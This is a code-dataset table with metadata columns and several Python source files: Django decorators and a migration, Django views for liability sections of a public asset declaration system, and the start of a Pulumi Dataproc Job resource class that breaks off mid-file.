hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6698bd14abe4e3f35667ab4d1e2105000e96f74 | 989 | py | Python | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | 1 | 2020-06-29T07:41:10.000Z | 2020-06-29T07:41:10.000Z | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | 4 | 2020-06-10T23:21:27.000Z | 2020-07-18T22:04:31.000Z | website/thesis/decorators.py | CodeJosh723/thesis-review-system | 9046eb9e803f48513f3f729f648d6b70f92cc425 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
def is_student(function):
def wrap(request, *args, **kwargs):
if not request.user.is_teacher:
return function(request, *args, **kwargs)
else:
return redirect('thesis:group_list')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
def is_teacher(function):
def wrap(request, *args, **kwargs):
if request.user.is_teacher:
return function(request, *args, **kwargs)
else:
return redirect('thesis:document_list')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
def has_group(function):
def wrap(request, *args, **kwargs):
if request.user.studentgroup:
return function(request, *args, **kwargs)
else:
return redirect('thesis:group_create_join')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
| 26.026316 | 55 | 0.645096 | 111 | 989 | 5.234234 | 0.261261 | 0.113597 | 0.175559 | 0.113597 | 0.836489 | 0.836489 | 0.836489 | 0.777969 | 0.777969 | 0.641997 | 0 | 0 | 0.253792 | 989 | 37 | 56 | 26.72973 | 0.787263 | 0 | 0 | 0.642857 | 0 | 0 | 0.061678 | 0.024267 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.035714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
a6a928a5f929d384b2cd3d87200b62f93d0455d4 | 3,261 | py | Python | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 3 | 2019-10-22T00:16:49.000Z | 2021-07-15T07:44:43.000Z | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 1,183 | 2018-04-19T18:40:30.000Z | 2022-03-31T21:05:05.000Z | retirement/migrations/0027_auto_20200526_0848.py | MelanieFJNR/Blitz-API | 9a6daecd158fe07a6aeb80cbf586781eb688f0f9 | [
"MIT"
] | 12 | 2018-04-17T19:16:42.000Z | 2022-01-27T00:19:59.000Z | # Generated by Django 2.2.12 on 2020-05-26 12:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('retirement', '0026_auto_20200403_0827'),
]
operations = [
migrations.AddField(
model_name='historicalretreat',
name='type',
field=models.CharField(choices=[('V', 'Virtual'), ('P', 'Physical')], default='P', max_length=100, verbose_name='Type of retreat'),
),
migrations.AddField(
model_name='historicalretreat',
name='videoconference_link',
field=models.TextField(blank=True, null=True, verbose_name='Videoconference link'),
),
migrations.AddField(
model_name='historicalretreat',
name='videoconference_tool',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Videoconference tool'),
),
migrations.AddField(
model_name='retreat',
name='type',
field=models.CharField(choices=[('V', 'Virtual'), ('P', 'Physical')], default='P', max_length=100, verbose_name='Type of retreat'),
),
migrations.AddField(
model_name='retreat',
name='videoconference_link',
field=models.TextField(blank=True, null=True, verbose_name='Videoconference link'),
),
migrations.AddField(
model_name='retreat',
name='videoconference_tool',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Videoconference tool'),
),
migrations.AlterField(
model_name='historicalretreat',
name='accessibility',
field=models.BooleanField(blank=True, null=True, verbose_name='Accessibility'),
),
migrations.AlterField(
model_name='historicalretreat',
name='has_shared_rooms',
field=models.BooleanField(blank=True, null=True),
),
migrations.AlterField(
model_name='historicalretreat',
name='place_name',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Place name'),
),
migrations.AlterField(
model_name='historicalretreat',
name='postal_code',
field=models.CharField(blank=True, max_length=10, null=True, verbose_name='Postal code'),
),
migrations.AlterField(
model_name='retreat',
name='accessibility',
field=models.BooleanField(blank=True, null=True, verbose_name='Accessibility'),
),
migrations.AlterField(
model_name='retreat',
name='has_shared_rooms',
field=models.BooleanField(blank=True, null=True),
),
migrations.AlterField(
model_name='retreat',
name='place_name',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Place name'),
),
migrations.AlterField(
model_name='retreat',
name='postal_code',
field=models.CharField(blank=True, max_length=10, null=True, verbose_name='Postal code'),
),
]
| 38.821429 | 143 | 0.597669 | 315 | 3,261 | 6.031746 | 0.193651 | 0.066316 | 0.078947 | 0.1 | 0.918947 | 0.918947 | 0.807368 | 0.782105 | 0.782105 | 0.782105 | 0 | 0.02291 | 0.277216 | 3,261 | 83 | 144 | 39.289157 | 0.783199 | 0.014106 | 0 | 0.909091 | 1 | 0 | 0.187675 | 0.007158 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012987 | 0 | 0.051948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a6b065c21e043ee0ad6c7a9d0c085a241153c7b8 | 16,700 | py | Python | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 2 | 2019-10-17T02:40:12.000Z | 2019-10-17T22:51:36.000Z | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 1 | 2019-10-02T20:23:12.000Z | 2019-10-02T20:23:12.000Z | declaraciones/declaracion/views/pasivos.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 4 | 2019-08-20T21:16:04.000Z | 2021-07-01T03:08:10.000Z | import uuid
from django.urls import reverse_lazy, resolve
from django.views import View
from django.shortcuts import render, redirect
from django.forms.models import model_to_dict
from django.http import HttpResponseRedirect, Http404
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
from declaracion.models import (Declaraciones, SeccionDeclaracion, DeudasOtros,
Secciones, SeccionDeclaracion)
from declaracion.forms import (ObservacionesForm, DomiciliosForm, DeudasForm,
DeudasOtrosForm, InfoPersonalVarForm)
from .utils import (guardar_estatus, no_aplica, declaracion_datos,
validar_declaracion,obtiene_avance)
from .declaracion import (DeclaracionDeleteView)
class DeudasDeleteView(DeclaracionDeleteView):
model = DeudasOtros
class DeudasView(View):
template_name = 'declaracion/pasivos/deudas.html'
@method_decorator(login_required(login_url='/login'))
def get(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
avance, faltas = 0,None
try:
declaracion = validar_declaracion(request, folio_declaracion)
avance, faltas = obtiene_avance(declaracion)
except:
raise Http404()
kwargs['cat_tipos_pasivos'] = 1
agregar, editar_id, deudas_data, informacion_registrada = (
declaracion_datos(kwargs, DeudasOtros, declaracion)
)
if deudas_data:
observaciones_data = deudas_data.observaciones
acreedor_infopersonalvar = deudas_data.acreedor_infopersonalvar
if acreedor_infopersonalvar.domicilios:
domicilio_data = acreedor_infopersonalvar.domicilios
domicilio_data = model_to_dict(domicilio_data)
else:
domicilio_data = {}
acreedor_infopersonalvar = model_to_dict(acreedor_infopersonalvar)
observaciones_data = model_to_dict(observaciones_data)
deudas_data = model_to_dict(deudas_data)
else:
observaciones_data = {}
domicilio_data = {}
deudas_data = {}
acreedor_infopersonalvar = {}
deudas_form = DeudasForm(prefix="deudas",
initial=deudas_data)
observaciones_form = ObservacionesForm(prefix="observaciones",
initial=observaciones_data)
domicilio_form = DomiciliosForm(prefix="domicilio",
initial=domicilio_data)
acreedor_infopersonalvar_form = InfoPersonalVarForm(
prefix="acreedor_infopersonalvar",
initial=acreedor_infopersonalvar)
return render(request, self.template_name, {
'deudas_form': deudas_form,
'observaciones_form': observaciones_form,
'domicilio_form': domicilio_form,
'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
'folio_declaracion': folio_declaracion,
'avance':avance,
'faltas':faltas,
'informacion_registrada': informacion_registrada,
'agregar': agregar,
'editar_id': editar_id
})
@method_decorator(login_required(login_url='/login'))
def post(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
try:
declaracion = validar_declaracion(request, folio_declaracion)
except:
raise Http404()
kwargs['cat_tipos_pasivos'] = 1
agregar, editar_id, deudas_data, informacion_registrada = (
declaracion_datos(kwargs, DeudasOtros, declaracion)
)
if deudas_data:
observaciones_data = deudas_data.observaciones
acreedor_infopersonalvar = deudas_data.acreedor_infopersonalvar
if acreedor_infopersonalvar.domicilios:
domicilio_data = acreedor_infopersonalvar.domicilios
else:
domicilio_data = None
else:
observaciones_data = None
domicilio_data = None
deudas_data = None
acreedor_infopersonalvar = None
deudas_form = DeudasForm(request.POST, prefix="deudas",
instance=deudas_data)
observaciones_form = ObservacionesForm(request.POST,
prefix="observaciones",
instance=observaciones_data)
domicilio_form = DomiciliosForm(request.POST,
prefix="domicilio",
instance=domicilio_data)
acreedor_infopersonalvar_form = InfoPersonalVarForm(
request.POST,
prefix="acreedor_infopersonalvar",
instance=acreedor_infopersonalvar)
deudas_is_valid = deudas_form.is_valid()
observaciones_is_valid = observaciones_form.is_valid()
domicilio_is_valid = domicilio_form.is_valid()
acreedor_infopersonalvar_is_valid = acreedor_infopersonalvar_form.is_valid()
if (deudas_is_valid and
observaciones_is_valid and
domicilio_is_valid and
acreedor_infopersonalvar_is_valid):
deudas = deudas_form.save(commit=False)
observaciones = observaciones_form.save()
domicilio = domicilio_form.save()
acreedor_infopersonalvar = acreedor_infopersonalvar_form.save(commit=False)
acreedor_infopersonalvar.declaraciones = declaracion
acreedor_infopersonalvar.domicilios = domicilio
acreedor_infopersonalvar.save()
deudas.acreedor_infopersonalvar = acreedor_infopersonalvar
deudas.declaraciones = declaracion
deudas.cat_tipos_pasivos_id = 1
deudas.observaciones = observaciones
deudas.save()
if not agregar and not editar_id:
status_obj, status_created = guardar_estatus(
request,
declaracion.folio,
SeccionDeclaracion.COMPLETA,
aplica=no_aplica(request))
if request.POST.get("accion") == "guardar_otro":
return redirect('declaracion:deudas-agregar', folio=folio_declaracion)
if request.POST.get("accion") == "guardar_salir":
return redirect('declaracion:perfil')
return redirect('declaracion:deudas-otros',
folio=folio_declaracion)
return render(request, self.template_name, {
'deudas_form': deudas_form,
'observaciones_form': observaciones_form,
'domicilio_form': domicilio_form,
'folio_declaracion': folio_declaracion,
'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
'avance':declaracion.avance,
'informacion_registrada': informacion_registrada,
'agregar': agregar,
'editar_id': editar_id
})
class DeudasOtrosDeleteView(DeclaracionDeleteView):
model = DeudasOtros
class DeudasOtrosView(View):
template_name = 'declaracion/pasivos/deudas-otros.html'
@method_decorator(login_required(login_url='/login'))
def get(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
avance, faltas = 0,None
try:
declaracion = validar_declaracion(request, folio_declaracion)
avance, faltas = obtiene_avance(declaracion)
except:
raise Http404()
kwargs['cat_tipos_pasivos'] = 2
agregar, editar_id, deudas_otros_data, informacion_registrada = (
declaracion_datos(kwargs, DeudasOtros, declaracion)
)
if deudas_otros_data:
observaciones_data = deudas_otros_data.observaciones
acreedor_infopersonalvar = deudas_otros_data.acreedor_infopersonalvar
if acreedor_infopersonalvar.domicilios:
domicilio_data = acreedor_infopersonalvar.domicilios
domicilio_data = model_to_dict(domicilio_data)
else:
domicilio_data = {}
acreedor_infopersonalvar = model_to_dict(acreedor_infopersonalvar)
observaciones_data = model_to_dict(observaciones_data)
deudas_otros_data = model_to_dict(deudas_otros_data)
else:
observaciones_data = {}
domicilio_data = {}
deudas_otros_data = {}
acreedor_infopersonalvar = {}
deudas_otros_form = DeudasOtrosForm(
prefix="deudas_otros",
initial=deudas_otros_data)
observaciones_form = ObservacionesForm(
prefix="observaciones",
initial=observaciones_data)
domicilio_form = DomiciliosForm(
prefix="domicilio",
initial=domicilio_data)
acreedor_infopersonalvar_form = InfoPersonalVarForm(
prefix="acreedor_infopersonalvar",
initial=acreedor_infopersonalvar)
return render(request, self.template_name, {
'deudas_otros_form': deudas_otros_form,
'observaciones_form': observaciones_form,
'domicilio_form': domicilio_form,
'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
'folio_declaracion': folio_declaracion,
'avance':avance,
'faltas':faltas,
'informacion_registrada': informacion_registrada,
'agregar': agregar,
'editar_id': editar_id
})
@method_decorator(login_required(login_url='/login'))
def post(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
try:
declaracion = validar_declaracion(request, folio_declaracion)
except:
raise Http404()
kwargs['cat_tipos_pasivos'] = 2
agregar, editar_id, deudas_otros_data, informacion_registrada = (
declaracion_datos(kwargs, DeudasOtros, declaracion)
)
if deudas_otros_data:
observaciones_data = deudas_otros_data.observaciones
acreedor_infopersonalvar = deudas_otros_data.acreedor_infopersonalvar
if acreedor_infopersonalvar.domicilios:
domicilio_data = acreedor_infopersonalvar.domicilios
else:
domicilio_data = None
else:
observaciones_data = None
domicilio_data = None
deudas_otros_data = None
acreedor_infopersonalvar = None
deudas_otros_form = DeudasOtrosForm(
request.POST,
prefix="deudas_otros",
instance=deudas_otros_data)
observaciones_form = ObservacionesForm(
request.POST,
prefix="observaciones",
instance=observaciones_data)
domicilio_form = DomiciliosForm(
request.POST,
prefix="domicilio",
instance=domicilio_data)
acreedor_infopersonalvar_form = InfoPersonalVarForm(
request.POST,
prefix="acreedor_infopersonalvar",
instance=acreedor_infopersonalvar)
deudas_otros_is_valid = deudas_otros_form.is_valid()
observaciones_is_valid = observaciones_form.is_valid()
domicilio_is_valid = domicilio_form.is_valid()
acreedor_infopersonalvar_is_valid = acreedor_infopersonalvar_form.is_valid()
if (deudas_otros_is_valid and
observaciones_is_valid and
domicilio_is_valid and
acreedor_infopersonalvar_is_valid):
deudas = deudas_otros_form.save(commit=False)
observaciones = observaciones_form.save()
domicilio = domicilio_form.save()
acreedor_infopersonalvar = acreedor_infopersonalvar_form.save(commit=False)
acreedor_infopersonalvar.declaraciones = declaracion
acreedor_infopersonalvar.domicilios = domicilio
acreedor_infopersonalvar.save()
deudas.acreedor_infopersonalvar = acreedor_infopersonalvar
deudas.declaraciones = declaracion
deudas.cat_tipos_pasivos_id = 2
deudas.observaciones = observaciones
deudas.save()
if not agregar and not editar_id:
status_obj, status_created = guardar_estatus(
request,
declaracion.folio,
SeccionDeclaracion.COMPLETA,
aplica=no_aplica(request))
if request.POST.get("accion") == "guardar_otro":
return redirect('declaracion:deudas-otros-agregar', folio=folio_declaracion)
if request.POST.get("accion") == "guardar_salir":
return redirect('declaracion:perfil')
return redirect('declaracion:pasivos-observaciones',
folio=folio_declaracion)
return render(request, self.template_name, {
'deudas_otros_form': deudas_otros_form,
'observaciones_form': observaciones_form,
'domicilio_form': domicilio_form,
'acreedor_infopersonalvar_form': acreedor_infopersonalvar_form,
'folio_declaracion': folio_declaracion,
'avance':declaracion.avance,
'informacion_registrada': informacion_registrada,
'agregar': agregar,
'editar_id': editar_id
})
class PasivosObservacionesView(View):
template_name = 'declaracion/pasivos/observaciones.html'
@method_decorator(login_required(login_url='/login'))
def get(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
avance, faltas = 0,None #obtiene_avance(declaracion)
try:
declaracion = validar_declaracion(request, folio_declaracion)
avance, faltas = obtiene_avance(declaracion)
except:
raise Http404()
current_url = resolve(request.path_info).url_name
seccion_id = Secciones.objects.filter(url=current_url).first()
seccion = SeccionDeclaracion.objects.filter(declaraciones=declaracion, seccion=seccion_id).first()
if seccion:
observaciones_data = seccion.observaciones
observaciones_data = model_to_dict(observaciones_data)
else:
observaciones_data = {}
observaciones_form = ObservacionesForm(
prefix="observaciones",
initial=observaciones_data)
return render(request, self.template_name, {
'observaciones_form': observaciones_form,
'folio_declaracion': folio_declaracion,
'avance':avance,
'faltas':faltas
})
@method_decorator(login_required(login_url='/login'))
def post(self, request, *args, **kwargs):
folio_declaracion = self.kwargs['folio']
try:
declaracion = validar_declaracion(request, folio_declaracion)
except:
raise Http404()
current_url = resolve(request.path_info).url_name
seccion_id = Secciones.objects.filter(url=current_url).first()
seccion = SeccionDeclaracion.objects.filter(declaraciones=declaracion, seccion=seccion_id).first()
if seccion:
observaciones_data = seccion.observaciones
else:
observaciones_data = None
observaciones_form = ObservacionesForm(
request.POST,
prefix="observaciones",
instance=observaciones_data)
observaciones_is_valid = observaciones_form.is_valid()
if observaciones_is_valid:
status_obj, status_created = guardar_estatus(request,
declaracion.folio,
SeccionDeclaracion.COMPLETA,
aplica=no_aplica(request))
observaciones = observaciones_form.save()
status_obj.observaciones = observaciones
status_obj.save()
if request.POST.get("accion") == "guardar_salir":
return redirect('declaracion:perfil')
return redirect('declaracion:confirmacion-informacion-personal',
folio=folio_declaracion)
return render(request, self.template_name, {
'observaciones_form': observaciones_form,
'folio_declaracion': folio_declaracion,
'avance':declaracion.avance
})
| 40.240964 | 106 | 0.630838 | 1,439 | 16,700 | 7.009729 | 0.084086 | 0.14593 | 0.042827 | 0.03569 | 0.869832 | 0.852682 | 0.829087 | 0.81154 | 0.809854 | 0.797958 | 0 | 0.002561 | 0.298623 | 16,700 | 414 | 107 | 40.338164 | 0.858619 | 0.001617 | 0 | 0.822857 | 0 | 0 | 0.086192 | 0.033949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017143 | false | 0 | 0.034286 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a6c9cbf709b3cd4ea1b1218c7220752309f6ec2e | 42,581 | py | Python | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/dataproc/job.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['JobArgs', 'Job']
@pulumi.input_type
class JobArgs:
def __init__(__self__, *,
placement: pulumi.Input['JobPlacementArgs'],
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input['JobHadoopConfigArgs']] = None,
hive_config: Optional[pulumi.Input['JobHiveConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input['JobPigConfigArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input['JobPysparkConfigArgs']] = None,
reference: Optional[pulumi.Input['JobReferenceArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input['JobSchedulingArgs']] = None,
spark_config: Optional[pulumi.Input['JobSparkConfigArgs']] = None,
sparksql_config: Optional[pulumi.Input['JobSparksqlConfigArgs']] = None):
"""
The set of arguments for constructing a Job resource.
:param pulumi.Input['JobPlacementArgs'] placement: The config of job placement.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input['JobHadoopConfigArgs'] hadoop_config: The config of Hadoop job
:param pulumi.Input['JobHiveConfigArgs'] hive_config: The config of hive job
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The list of labels (key/value pairs) to add to the job.
:param pulumi.Input['JobPigConfigArgs'] pig_config: The config of pag job.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input['JobPysparkConfigArgs'] pyspark_config: The config of pySpark job.
:param pulumi.Input['JobReferenceArgs'] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input['JobSchedulingArgs'] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input['JobSparkConfigArgs'] spark_config: The config of the Spark job.
:param pulumi.Input['JobSparksqlConfigArgs'] sparksql_config: The config of SparkSql job
"""
pulumi.set(__self__, "placement", placement)
if force_delete is not None:
pulumi.set(__self__, "force_delete", force_delete)
if hadoop_config is not None:
pulumi.set(__self__, "hadoop_config", hadoop_config)
if hive_config is not None:
pulumi.set(__self__, "hive_config", hive_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if pig_config is not None:
pulumi.set(__self__, "pig_config", pig_config)
if project is not None:
pulumi.set(__self__, "project", project)
if pyspark_config is not None:
pulumi.set(__self__, "pyspark_config", pyspark_config)
if reference is not None:
pulumi.set(__self__, "reference", reference)
if region is not None:
pulumi.set(__self__, "region", region)
if scheduling is not None:
pulumi.set(__self__, "scheduling", scheduling)
if spark_config is not None:
pulumi.set(__self__, "spark_config", spark_config)
if sparksql_config is not None:
pulumi.set(__self__, "sparksql_config", sparksql_config)
@property
@pulumi.getter
def placement(self) -> pulumi.Input['JobPlacementArgs']:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@placement.setter
def placement(self, value: pulumi.Input['JobPlacementArgs']):
pulumi.set(self, "placement", value)
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> Optional[pulumi.Input[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@force_delete.setter
def force_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_delete", value)
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> Optional[pulumi.Input['JobHadoopConfigArgs']]:
"""
The config of Hadoop job
"""
return pulumi.get(self, "hadoop_config")
@hadoop_config.setter
def hadoop_config(self, value: Optional[pulumi.Input['JobHadoopConfigArgs']]):
pulumi.set(self, "hadoop_config", value)
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> Optional[pulumi.Input['JobHiveConfigArgs']]:
"""
The config of hive job
"""
return pulumi.get(self, "hive_config")
@hive_config.setter
def hive_config(self, value: Optional[pulumi.Input['JobHiveConfigArgs']]):
pulumi.set(self, "hive_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The list of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> Optional[pulumi.Input['JobPigConfigArgs']]:
"""
The config of pag job.
"""
return pulumi.get(self, "pig_config")
@pig_config.setter
def pig_config(self, value: Optional[pulumi.Input['JobPigConfigArgs']]):
pulumi.set(self, "pig_config", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> Optional[pulumi.Input['JobPysparkConfigArgs']]:
"""
The config of pySpark job.
"""
